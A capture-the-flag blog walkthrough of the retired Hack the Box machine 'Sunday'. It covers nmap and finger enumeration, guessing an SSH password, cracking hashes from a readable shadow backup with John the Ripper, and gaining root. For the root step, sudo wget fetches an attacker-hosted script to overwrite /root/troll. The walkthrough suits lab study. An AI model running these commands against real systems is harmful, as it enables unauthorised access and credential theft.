Next up in my series of guides to retired Hack the Box machines, is my writeup of Sunday. This is listed as a 20 point box so it should be quite simple, however there were a couple of trolling moments in the course of exploiting it.
So lets start as always with our nmap scan. It can take quite a while on this box, so be patient, go and make a cup of tea or grab something stronger.
$ nmap -sC -sV -p- -oA nmap/scan 10.10.10.76
We can see a few interesting ports open here; firstly the finger service port which nmap has helpfully already ran a script against to enumerate some users. Here we can see a user called
sunny is logged in. We can also see that ssh is available, albeit on a different port to usual.
As we have a username, and an ssh service, the first thing we will try is a few guesses of basic passwords:
sunday, and bang,
sunday gets us in!
$ ssh -p 22022 [email protected]
So now we have a shell lets see if we have a user flag in the usual place of the Desktop folder ... and unfortunately it would seem that this is not the user we need. Time to enumerate further.
/etc/passwd file we can see another user account called
$ cat /etc/passwd root:x:0:0:Super-User:/root:/usr/bin/bash daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: ... ... ... sammy:x:101:10:sammy:/export/home/sammy:/bin/bash sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
That looks like a good candidate for us to aim for. Running
sudo -l shows us a binary file we can run as root without a password; which is aptly named
/root/troll. Running that file simply prints out
testing and the output of the
With that deadend, we start enumerating the box further, and in our investigations we come across a backup folder which seems to contain a readable copy of the shadow file.
$ cd /backup $ cat shadow.backup mysql:NP::::::: openldap:*LK*::::::: webservd:*LK*::::::: postgres:NP::::::: svctag:*LK*:6445:::::: nobody:*LK*:6445:::::: noaccess:*LK*:6445:::::: nobody4:*LK*:6445:::::: sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
So with both this shadow file and the standard passwd file we can make local copies of them and start up john the ripper.
$ unshadow passwd shadow > passwords.txt $ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt Warning: detected hash type "sha256crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x]) Remaining 1 password hash Press 'q' or Ctrl-C to abort, almost any other key for status cooldude! (sammy) 1g 0:00:02:32 DONE (2018-05-09 20:21) 0.006559g/s 1336p/s 1336c/s 1336C/s coolster..chs2009 Use the "--show" option to display all of the cracked passwords reliably Session completed $ john --show passwords.txt sammy:cooldude!:101:10:sammy:/export/home/sammy:/bin/bash sunny:sunday:65535:1:sunny:/export/home/sunny:/bin/bash 2 password hashes cracked, 0 left
We have sammy's password, so now we can ssh in as sammy and finally we have access to the user flag!
Yet More Enumeration
As we are now logged in as a new user account, we start our enumeration again. Checking
sudo -l again shows us that this user is able to run the
wget command as root without any passwords. So maybe we can chain this together with the binary from the previous user account and get root.
First thing we do is create a very small bash script:
Then we fire up a simple HTTP server using python, then in our sammy ssh session we can run the following:
$ wget http://10.10.14.15:8000/su.sh -O /root/troll
Everything downloads fine, but by time we have swapped over to our sunny ssh account the troll binary seems to have not been overwritten, and just prints the same output as before. Hmmm, this binary is definitely well named.
Looking at the processes running on this machine we spot a script running in the root directory called
overwrite, so we can surmise that any changes to the
troll binary will get overwritten in a short time frame. We should still have a small window, however.
So we set up concurrent ssh sessions, each logged in as the different users we have the passwords for. Then we
wget our script in one window, quickly switch over to the other window and run the
And there we have root, and access to this final flag!